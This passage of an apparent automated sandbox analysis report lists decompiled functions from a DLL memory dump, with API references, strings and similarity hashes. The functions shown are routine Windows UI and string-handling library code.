					__eflags =  *(_t10 + 0x68);
					if( *(_t10 + 0x68) == 0) {
						goto L5;
					}
					return 0;
				}
				L1:
				return 1;
			}

0x10015fee
0x10015fee
0x10015ff5
0x10015ff9
0x10016002
0x1001600b
0x10016010
0x10016012
0x1001601e
0x1001601e
0x10016025
0x10016080
0x00000000
0x10016083
0x10016027
0x1001602a
0x1001602d
0x10016034
0x1001603e
0x10016040
0x00000000
0x00000000
0x10016049
0x1001604e
0x10016050
0x00000000
0x00000000
0x10016057
0x1001605d
0x1001605f
0x1001606c
0x10016078
0x00000000
0x10016078
0x10016062
0x10016068
0x1001606a
0x00000000
0x00000000
0x00000000
0x1001606a
0x1001602f
0x10016032
0x00000000
0x00000000
0x00000000
0x10016032
0x10016014
0x10016018
0x00000000
0x00000000
0x00000000
0x1001601a
0x10016004
0x00000000

Strings

Edit, xrefs: 10016042

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: 9ccabf98ca9fd4fff5f0ae257c32244cbb8940e8b08857277c0723138cd7fcdd
Instruction ID: 9b6a865b00a5ec6505c4f9fcb60a0b53383f3b2574e4019b85b62cae9878b81c
Opcode Fuzzy Hash: 9ccabf98ca9fd4fff5f0ae257c32244cbb8940e8b08857277c0723138cd7fcdd
Instruction Fuzzy Hash: F811C430600201A7EB62DB219C05B5BB7ECEF4D7D0F110529F542EB0B1DB71EC91D664

Uniqueness

Uniqueness Score: -1.00%

Function 10019659, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E10019659(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t20;
				intOrPtr _t26;
				void* _t32;
				void* _t33;

				_push(4);
				E10041CAB(0x100537d1, __ebx, __edi, __esi);
				_t32 = __ecx;
				 *((intOrPtr*)(_t33 - 0x10)) = 0;
				E100195F5(__ecx, 0x20, _t33 - 0x10);
				if( *((intOrPtr*)(_t33 + 8)) != 0) {
					_t36 =  *((intOrPtr*)(_t33 - 0x10));
					if( *((intOrPtr*)(_t33 - 0x10)) == 0) {
						_t26 = E100092FB(_t36, 0x20);
						 *((intOrPtr*)(_t33 - 0x10)) = _t26;
						 *(_t33 - 4) = 0;
						_t37 = _t26;
						if(_t26 == 0) {
							_t20 = 0;
							__eflags = 0;
						} else {
							_push(0x1e);
							_push( *((intOrPtr*)(_t33 + 8)));
							_push("File%d");
							_push("Recent File List");
							_push(0);
							_t20 = E10034D15(__ebx, _t26, 0, _t32, _t37);
						}
						 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t32 + 0x88)) = _t20;
						 *((intOrPtr*)( *_t20 + 0x10))();
					}
				}
				 *((intOrPtr*)(_t32 + 0x94)) = E1001B4A8(_t32, "Settings", "PreviewPages", 0);
				return E10041D83(_t17);
			}

0x10019659
0x10019660
0x10019665
0x1001966f
0x10019672
0x1001967a
0x1001967c
0x1001967f
0x10019689
0x1001968b
0x1001968e
0x10019691
0x10019693
0x100196ac
0x100196ac
0x10019695
0x10019695
0x10019697
0x1001969a
0x1001969f
0x100196a4
0x100196a5
0x100196a5
0x100196ae
0x100196b2
0x100196bc
0x100196bc
0x1001967f
0x100196d1
0x100196dc

APIs

__EH_prolog3.LIBCMT ref: 10019660

Part of subcall function 100092FB: _malloc.LIBCMT ref: 10009319

Part of subcall function 10034D15: __EH_prolog3.LIBCMT ref: 10034D1C

Strings

Settings, xrefs: 100196C5
File%d, xrefs: 1001969A
PreviewPages, xrefs: 100196C0
Recent File List, xrefs: 1001969F

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3$_malloc
String ID: File%d$PreviewPages$Recent File List$Settings
API String ID: 1683881009-526586445
Opcode ID: 41277a81b6745a42d96c60aae7086308faf945b3d60d74ce9c6f73836d00b3ba
Instruction ID: aeea59e93111dc3f49cd8843fb9a087a380c537939999af9e5b94e09437542c7
Opcode Fuzzy Hash: 41277a81b6745a42d96c60aae7086308faf945b3d60d74ce9c6f73836d00b3ba
Instruction Fuzzy Hash: A601F274E00604ABCB56DF708C45AAE76B2FF88340F20452AF626BF182DB3096818768

Uniqueness

Uniqueness Score: -1.00%

Function 1000AA97, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E1000AA97(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				void* _t9;
				void* _t10;

				_t10 = __ecx;
				_t4 = GetModuleHandleA("GDI32.DLL");
				_t9 = 0;
				_t5 = GetProcAddress(_t4, "SetLayout");
				if(_t5 == 0) {
					if(_a4 != 0) {
						_t9 = 0xffffffff;
						SetLastError(0x78);
					}
				} else {
					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
				}
				return _t9;
			}

0x1000aaa3
0x1000aaa5
0x1000aab1
0x1000aab3
0x1000aabb
0x1000aacc
0x1000aad0
0x1000aad3
0x1000aad3
0x1000aabd
0x1000aac5
0x1000aac5
0x1000aade

APIs

GetModuleHandleA.KERNEL32(GDI32.DLL), ref: 1000AAA5
GetProcAddress.KERNEL32(00000000,SetLayout), ref: 1000AAB3
SetLastError.KERNEL32(00000078), ref: 1000AAD3

Strings

SetLayout, xrefs: 1000AAAB
GDI32.DLL, xrefs: 1000AA9E

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: GDI32.DLL$SetLayout
API String ID: 4275029093-2147214759
Opcode ID: 3f2d104356163e3a8a21b35f40068a89d40f7ca661a772df5213a1b3740f19b7
Instruction ID: e832692adf93b24ff1632328ce071c4967a4ffc823a3cb339492d5cd4a438df8
Opcode Fuzzy Hash: 3f2d104356163e3a8a21b35f40068a89d40f7ca661a772df5213a1b3740f19b7
Instruction Fuzzy Hash: E4E02B3330010077E7109795DC4884B7F66D7CA7B27144721F616C3490CB328840D361

Uniqueness

Uniqueness Score: -1.00%

Function 1001A7EC, Relevance: 7.7, APIs: 5, Instructions: 164
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E1001A7EC(void* __ebx, void* __ecx, void* __edi, signed short* __esi, void* __eflags) {
				signed int _t83;
				intOrPtr _t85;
				void* _t91;
				intOrPtr _t96;
				CHAR** _t98;
				signed int _t101;
				signed int _t103;
				signed int _t108;
				intOrPtr _t110;
				CHAR** _t117;
				int _t120;
				CHAR** _t122;
				int _t125;
				signed int _t126;
				void* _t130;
				void* _t135;
				signed int _t149;
				void* _t151;
				signed short* _t155;

				_t150 = __esi;
				_t131 = __ecx;
				_push(0x188);
				E10041CAB(0x10052818, __ebx, __edi, __esi);
				_t130 = __ecx;
				_t149 = 0;
				 *(_t151 - 0x10) = 0;
				if( *((intOrPtr*)(_t151 + 8)) != 0) {
					L29:
					_push(_t149);
					_push(0x14000c);
					_push(1);
					E10035682(_t130, _t151 - 0x194, _t149, _t150, __eflags);
					 *(_t151 - 4) = 3;
					E100358E3(_t151 - 0x194);
					_t83 =  *(_t130 + 0x70);
					__eflags = _t83 - _t149;
					if(_t83 != _t149) {
						E100270D1(_t83);
					}
					_t84 =  *(_t130 + 0x74);
					__eflags =  *(_t130 + 0x74) - _t149;
					if(__eflags != 0) {
						E100270D1(_t84);
					}
					_t85 =  *((intOrPtr*)(_t151 - 0x120));
					 *(_t130 + 0x70) =  *(_t85 + 8);
					 *(_t130 + 0x74) =  *(_t85 + 0xc);
					 *((intOrPtr*)(_t151 - 0x194)) = 0x10059414;
					_t135 = _t151 - 0x194;
					L34:
					 *(_t151 - 4) =  *(_t151 - 4) | 0xffffffff;
					_t87 = E10015E8D(_t135, _t149, _t150,  *(_t151 - 4));
					L35:
					return E10041D83(_t87);
				}
				_t91 =  *(__ecx + 0x74);
				if(_t91 == 0) {
					goto L29;
				}
				_t150 = GlobalLock(_t91);
				_t155 = _t150;
				_t87 = 0 | _t155 == 0x00000000;
				_t156 = _t155 == 0;
				if(_t155 == 0) {
					_t87 = E1000A5CD(_t130, _t131, 0, _t150, _t156);
				}
				_t157 = _t150[3] & 0x00000001;
				if((_t150[3] & 0x00000001) == 0) {
					goto L35;
				}
				_push(_t149);
				_push(0x14000c);
				_push(1);
				E10035682(_t130, _t151 - 0xd8, _t149, _t150, _t157);
				 *(_t151 - 4) = _t149;
				if(E100358E3(_t151 - 0xd8) != 0) {
					_t96 =  *((intOrPtr*)(_t151 - 0x64));
					__eflags =  *((intOrPtr*)(_t96 + 0xc)) - _t149;
					if( *((intOrPtr*)(_t96 + 0xc)) != _t149) {
						_t98 = E100358F6(_t151 - 0xd8, _t151 - 0x18);
						_t149 = lstrcmpA;
						 *(_t151 - 4) = 1;
						 *(_t151 - 0x10) = 1;
						_t101 = lstrcmpA(_t150 + ( *_t150 & 0x0000ffff),  *_t98);
						__eflags = _t101;
						if(_t101 != 0) {
							L14:
							 *((char*)(_t151 + 0xb)) = 1;
							L15:
							__eflags =  *(_t151 - 0x10) & 0x00000004;
							if(( *(_t151 - 0x10) & 0x00000004) != 0) {
								 *(_t151 - 0x10) =  *(_t151 - 0x10) & 0xfffffffb;
								__eflags =  *((intOrPtr*)(_t151 - 0x1c)) + 0xfffffff0;
								E10001020( *((intOrPtr*)(_t151 - 0x1c)) + 0xfffffff0);
							}
							__eflags =  *(_t151 - 0x10) & 0x00000002;
							if(( *(_t151 - 0x10) & 0x00000002) != 0) {
								 *(_t151 - 0x10) =  *(_t151 - 0x10) & 0xfffffffd;
								__eflags =  *((intOrPtr*)(_t151 - 0x14)) + 0xfffffff0;
								E10001020( *((intOrPtr*)(_t151 - 0x14)) + 0xfffffff0);
							}
							 *(_t151 - 4) =  *(_t151 - 4) & 0x00000000;
							__eflags =  *(_t151 - 0x10) & 0x00000001;
							if(( *(_t151 - 0x10) & 0x00000001) != 0) {
								__eflags =  *((intOrPtr*)(_t151 - 0x18)) + 0xfffffff0;
								E10001020( *((intOrPtr*)(_t151 - 0x18)) + 0xfffffff0);
							}
							__eflags =  *((char*)(_t151 + 0xb));
							if( *((char*)(_t151 + 0xb)) == 0) {
								_t103 =  *( *((intOrPtr*)(_t151 - 0x64)) + 8);
								__eflags = _t103;
								if(_t103 != 0) {
									E100270D1(_t103);
								}
								_t105 =  *( *((intOrPtr*)(_t151 - 0x64)) + 0xc);
								__eflags =  *( *((intOrPtr*)(_t151 - 0x64)) + 0xc);
								if(__eflags != 0) {
									E100270D1(_t105);
								}
							} else {
								_t108 =  *(_t130 + 0x70);
								__eflags = _t108;
								if(_t108 != 0) {
									E100270D1(_t108);
								}
								E100270D1( *(_t130 + 0x74));
								_t110 =  *((intOrPtr*)(_t151 - 0x64));
								 *(_t130 + 0x70) =  *(_t110 + 8);
								 *(_t130 + 0x74) =  *(_t110 + 0xc);
							}
							goto L6;
						}
						_t117 = E10035929(_t151 - 0xd8, _t151 - 0x14);
						 *(_t151 - 4) = 2;
						 *(_t151 - 0x10) = 3;
						_t120 = lstrcmpA(_t150 + (_t150[1] & 0x0000ffff),  *_t117);
						__eflags = _t120;
						if(_t120 != 0) {
							goto L14;
						}
						_t122 = E1003595D(_t151 - 0xd8, _t151 - 0x1c);
						 *(_t151 - 0x10) = 7;
						_t125 = lstrcmpA(_t150 + (_t150[2] & 0x0000ffff),  *_t122);
						 *((char*)(_t151 + 0xb)) = 0;
						__eflags = _t125;
						if(_t125 == 0) {
							goto L15;
						}
						goto L14;
					}
					_t126 =  *(_t130 + 0x70);
					__eflags = _t126 - _t149;
					if(_t126 != _t149) {
						E100270D1(_t126);
					}
					E100270D1( *(_t130 + 0x74));
					 *(_t130 + 0x70) = _t149;
					 *(_t130 + 0x74) = _t149;
				}
				L6:
				 *((intOrPtr*)(_t151 - 0xd8)) = 0x10059414;
				_t135 = _t151 - 0xd8;
				goto L34;
			}

0x1001a7ec
0x1001a7ec
0x1001a7ec
0x1001a7f6
0x1001a7fb
0x1001a7fd
0x1001a7ff
0x1001a805
0x1001a9b6
0x1001a9b6
0x1001a9b7
0x1001a9bc
0x1001a9c4
0x1001a9cf
0x1001a9d6
0x1001a9db
0x1001a9de
0x1001a9e0
0x1001a9e3
0x1001a9e3
0x1001a9e8
0x1001a9eb
0x1001a9ed
0x1001a9f0
0x1001a9f0
0x1001a9f5
0x1001a9fe
0x1001aa04
0x1001aa07
0x1001aa11
0x1001aa17
0x1001aa17
0x1001aa1b
0x1001aa20
0x1001aa25
0x1001aa25
0x1001a80b
0x1001a810
0x00000000
0x00000000
0x1001a81d
0x1001a821
0x1001a823
0x1001a826
0x1001a828
0x1001a82a
0x1001a82a
0x1001a82f
0x1001a833
0x00000000
0x00000000
0x1001a839
0x1001a83a
0x1001a83f
0x1001a847
0x1001a852
0x1001a85c
0x1001a873
0x1001a876
0x1001a879
0x1001a8a2
0x1001a8ac
0x1001a8b5
0x1001a8b9
0x1001a8c0
0x1001a8c2
0x1001a8c4
0x1001a91b
0x1001a91b
0x1001a91f
0x1001a91f
0x1001a923
0x1001a928
0x1001a92c
0x1001a92f
0x1001a92f
0x1001a934
0x1001a938
0x1001a93d
0x1001a941
0x1001a944
0x1001a944
0x1001a949
0x1001a94d
0x1001a951
0x1001a956
0x1001a959
0x1001a959
0x1001a95e
0x1001a962
0x1001a990
0x1001a993
0x1001a995
0x1001a998
0x1001a998
0x1001a9a0
0x1001a9a3
0x1001a9a5
0x1001a9ac
0x1001a9ac
0x1001a964
0x1001a964
0x1001a967
0x1001a969
0x1001a96c
0x1001a96c
0x1001a974
0x1001a979
0x1001a97f
0x1001a985
0x1001a985
0x00000000
0x1001a962
0x1001a8d0
0x1001a8de
0x1001a8e5
0x1001a8ec
0x1001a8ee
0x1001a8f0
0x00000000
0x00000000
0x1001a8fc
0x1001a90a
0x1001a911
0x1001a913
0x1001a917
0x1001a919
0x00000000
0x00000000
0x00000000
0x1001a919
0x1001a87b
0x1001a87e
0x1001a880
0x1001a883
0x1001a883
0x1001a88b
0x1001a890
0x1001a893
0x1001a893
0x1001a85e
0x1001a85e
0x1001a868
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 1001A7F6
GlobalLock.KERNEL32 ref: 1001A817

Part of subcall function 1000A5CD: __CxxThrowException@8.LIBCMT ref: 1000A5E3
Part of subcall function 1000A5CD: __EH_prolog3.LIBCMT ref: 1000A5F0

lstrcmpA.KERNEL32(00000000,00000000,?,00000001,0014000C,00000000), ref: 1001A8C0
lstrcmpA.KERNEL32(?,00000000,?), ref: 1001A8EC
lstrcmpA.KERNEL32(?,00000000,?), ref: 1001A911

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcmp$H_prolog3$Exception@8GlobalLockThrow
String ID:
API String ID: 569107404-0
Opcode ID: 9f87eeca638c1f5fffaee33dcb29a2b176cb9803bdb2194e411a9ad86b1158e8
Instruction ID: 3bd9ec18b9d91f42a86bcb6161b3e11c34a3bf3ee4ff96d17e4c85a88841980c
Opcode Fuzzy Hash: 9f87eeca638c1f5fffaee33dcb29a2b176cb9803bdb2194e411a9ad86b1158e8
Instruction Fuzzy Hash: ED617C709002099FDB12CFA4CD85BADB7F4EF05350F114289E859AB2A6DB75EEC5CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10002CA0, Relevance: 7.6, APIs: 5, Instructions: 98
stringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E10002CA0(char** __ecx, short* _a4, int _a8) {
				long _v8;
				int _v12;
				signed int _v16;
				char** _v52;
				signed int _t38;
				long _t40;
				signed int _t49;
				int* _t51;
				void* _t52;
				void* _t71;
				void* _t72;

				_v52 = __ecx;
				if(_a4 != 0) {
					_v16 = lstrlenW(_a4) + 1;
					_v12 = _v16 << 2;
					E10003010(_t52, _t71, _t72, _v52, _v12,  &(_v52[1]), 0x80);
					_t38 = WideCharToMultiByte(_a8, 0, _a4, _v16,  *_v52, _v12, 0, 0);
					asm("sbb eax, eax");
					_t40 =  ~_t38 + 1;
					_v8 = _t40;
					if(_t40 != 0) {
						_t40 = GetLastError();
						if(_t40 == 0x7a) {
							_v12 = WideCharToMultiByte(_a8, 0, _a4, _v16, 0, 0, 0, 0);
							E10003010(_t52, _t71, _t72, _v52, _v12,  &(_v52[1]), 0x80);
							_t49 = WideCharToMultiByte(_a8, 0, _a4, _v16,  *_v52, _v12, 0, 0);
							asm("sbb eax, eax");
							_t40 =  ~_t49 + 1;
							_v8 = _t40;
						}
					}
					if(_v8 == 0) {
						return _t40;
					} else {
						return E10001CF0();
					}
				}
				_t51 = _v52;
				 *_t51 = 0;
				return _t51;
			}

0x10002ca6
0x10002cad
0x10002cca
0x10002cd3
0x10002cea
0x10002d0e
0x10002d16
0x10002d18
0x10002d1b
0x10002d1e
0x10002d20
0x10002d29
0x10002d47
0x10002d5e
0x10002d82
0x10002d8a
0x10002d8c
0x10002d8f
0x10002d8f
0x10002d29
0x10002d96
0x10002da0
0x10002d98
0x00000000
0x10002d98
0x10002d96
0x10002caf
0x10002cb2
0x00000000

APIs

lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,1000215D,?), ref: 10002CC1
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 10002D0E
GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 10002D20
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 10002D41
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 10002D82

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: 5cf92689d80844df7becc589b1806a415bf8111e575ba180d9e54f288089be78
Instruction ID: 272bdecc138a2cebbebabc8f2af29b051473fe8c5107ce5a3ddcd64ec20e7416
Opcode Fuzzy Hash: 5cf92689d80844df7becc589b1806a415bf8111e575ba180d9e54f288089be78
Instruction Fuzzy Hash: C7310FB9A50218BFEB04DFA8DC96F9E77B9FB48740F108548F515EB284D771AA40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10005FF0, Relevance: 7.6, APIs: 5, Instructions: 97
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10005FF0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a8) {
				int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v36;
				char _v40;
				intOrPtr* _v80;
				intOrPtr* _v84;
				void* __ebp;
				void* _t100;

				_t100 = __eflags;
				_v80 = __ecx;
				_v84 = E10003110();
				_v12 =  *((intOrPtr*)( *((intOrPtr*)( *_v84 + 0x6c))))();
				_v16 = E1001F4AD(__ebx, _v12, __edi, __esi, _t100, GetSubMenu( *(_v12 + 4), 1));
				_v8 = GetMenuItemCount( *(_v16 + 4));
				_v20 = 0;
				while(_v20 < _v8) {
					_v24 = GetMenuItemID( *(_v16 + 4), _v20);
					if(_v24 != 0 && _v24 != 0xffffffff) {
						_v28 =  *((intOrPtr*)( *((intOrPtr*)( *_v80 + 0x22c))))(_v24,  &_v40,  &_v36);
						_v32 = E10007240(_v80 + 0xf4, _v28);
						if((_v32 & 0x00000002) != 0) {
							EnableMenuItem( *(_v16 + 4), _v24, 0);
						} else {
							EnableMenuItem( *(_v16 + 4), _v24, 3);
						}
					}
					_v20 = _v20 + 1;
				}
				E1000D6AD(_v16, __eflags, 0,  *_a8,  *((intOrPtr*)(_a8 + 4)), _v80, 0);
				__eflags = 0;
				return 0;
			}

0x10005ff0
0x10005ff6
0x10005ffe
0x1000600e
0x10006026
0x10006036
0x10006039
0x1000604b
0x10006068
0x1000606f
0x10006093
0x100060a8
0x100060b1
0x100060d5
0x100060b3
0x100060c0
0x100060c0
0x100060b1
0x10006048
0x10006048
0x100060f8
0x100060fd
0x10006102

APIs

GetSubMenu.USER32 ref: 1000601A
GetMenuItemCount.USER32 ref: 10006030
GetMenuItemID.USER32(?,00000000), ref: 10006062
EnableMenuItem.USER32 ref: 100060C0
EnableMenuItem.USER32 ref: 100060D5

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Item$Enable$Count
String ID:
API String ID: 4027636154-0
Opcode ID: af6ac1dd4f77ea68d2e6260e533ef23bdab7ad6dc0235a21d6ee88f3f1dd9556
Instruction ID: e5617c2288b1d0567cd96f7f7dcccfc77c76087378aa717636abcc54b1e72752
Opcode Fuzzy Hash: af6ac1dd4f77ea68d2e6260e533ef23bdab7ad6dc0235a21d6ee88f3f1dd9556
Instruction Fuzzy Hash: D041D875E00119AFDB44CFD4C894AAFBBB5FF8C300F208659E915AB394D771A901CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000F9A8, Relevance: 7.6, APIs: 5, Instructions: 80
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E1000F9A8(signed int __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags) {
				struct HWND__* _t29;
				signed int _t32;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t53;
				void* _t54;
				void* _t55;

				_t55 = __eflags;
				_t42 = __ebx;
				_push(0x80);
				E10041CAB(0x100520c9, __ebx, __edi, __esi);
				 *(_t54 - 0x10) = __ecx;
				E100095FD(_t54 - 0x38);
				_t45 = _t54 - 0x8c;
				E1000D539(_t54 - 0x8c, _t55);
				 *(_t54 - 4) = 0;
				_t29 = GetTopWindow( *(__ecx + 0x20));
				while(1) {
					_t53 = _t29;
					if(_t53 == 0) {
						break;
					}
					 *(_t54 - 0x6c) = _t53;
					 *((intOrPtr*)(_t54 - 0x34)) = GetDlgCtrlID(_t53);
					 *((intOrPtr*)(_t54 - 0x24)) = _t54 - 0x8c;
					_t32 = E1000EC15(_t45, 0, _t53, __eflags, _t53);
					__eflags = _t32;
					if(_t32 == 0) {
						L3:
						_t45 =  *(_t54 - 0x10);
						__eflags = E10009489( *(_t54 - 0x10), 0, _t53,  *((intOrPtr*)(_t54 - 0x34)), 0xffffffff, _t54 - 0x38, 0);
						if(__eflags == 0) {
							_t42 =  *(_t54 + 0xc);
							__eflags = _t42;
							if(_t42 != 0) {
								_t36 = SendMessageA( *(_t54 - 0x6c), 0x87, 0, 0);
								__eflags = _t36 & 0x00002000;
								if((_t36 & 0x00002000) == 0) {
									L10:
									_t42 = 0;
									__eflags = 0;
								} else {
									_t38 = E10012193(_t54 - 0x8c) & 0x0000000f;
									__eflags = _t38 - 3;
									if(_t38 == 3) {
										goto L10;
									} else {
										__eflags = _t38 - 6;
										if(_t38 == 6) {
											goto L10;
										} else {
											__eflags = _t38 - 7;
											if(_t38 == 7) {
												goto L10;
											} else {
												__eflags = _t38 - 9;
												if(_t38 == 9) {
													goto L10;
												}
											}
										}
									}
								}
							}
							_t45 = _t54 - 0x38;
							E10009623(_t54 - 0x38,  *((intOrPtr*)(_t54 + 8)), _t42);
						}
					} else {
						_t45 = _t32;
						__eflags = E10009489(_t32, 0, _t53, 0, 0xbd11ffff, _t54 - 0x38, 0);
						if(__eflags == 0) {
							goto L3;
						}
					}
					_t29 = GetWindow(_t53, 2);
				}
				_t21 = _t54 - 4;
				 *(_t54 - 4) =  *(_t54 - 4) | 0xffffffff;
				 *(_t54 - 0x6c) = 0;
				return E10041D83(E1000F543(_t42, _t54 - 0x8c, 0, _t53,  *_t21));
			}

0x1000f9a8
0x1000f9a8
0x1000f9a8
0x1000f9b2
0x1000f9b9
0x1000f9bf
0x1000f9c4
0x1000f9ca
0x1000f9d4
0x1000f9d7
0x1000fa85
0x1000fa85
0x1000fa89
0x00000000
0x00000000
0x1000f9e3
0x1000f9ec
0x1000f9f6
0x1000f9f9
0x1000f9fe
0x1000fa00
0x1000fa18
0x1000fa18
0x1000fa2a
0x1000fa2c
0x1000fa2e
0x1000fa31
0x1000fa33
0x1000fa3f
0x1000fa45
0x1000fa4a
0x1000fa6e
0x1000fa6e
0x1000fa6e
0x1000fa4c
0x1000fa57
0x1000fa5a
0x1000fa5d
0x00000000
0x1000fa5f
0x1000fa5f
0x1000fa62
0x00000000
0x1000fa64
0x1000fa64
0x1000fa67
0x00000000
0x1000fa69
0x1000fa69
0x1000fa6c
0x00000000
0x00000000
0x1000fa6c
0x1000fa67
0x1000fa62
0x1000fa5d
0x1000fa4a
0x1000fa74
0x1000fa77
0x1000fa77
0x1000fa02
0x1000fa0d
0x1000fa14
0x1000fa16
0x00000000
0x00000000
0x1000fa16
0x1000fa7f
0x1000fa7f
0x1000fa8f
0x1000fa8f
0x1000fa99
0x1000faa6

APIs

__EH_prolog3.LIBCMT ref: 1000F9B2
GetTopWindow.USER32(?), ref: 1000F9D7
GetDlgCtrlID.USER32 ref: 1000F9E6
SendMessageA.USER32(?,00000087,00000000,00000000), ref: 1000FA3F
GetWindow.USER32(00000000,00000002), ref: 1000FA7F

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CtrlH_prolog3MessageSend
String ID:
API String ID: 849854284-0
Opcode ID: 896440ab69eea206496d200f3a3080d3f363082d1f18ac4021212de0202a864c
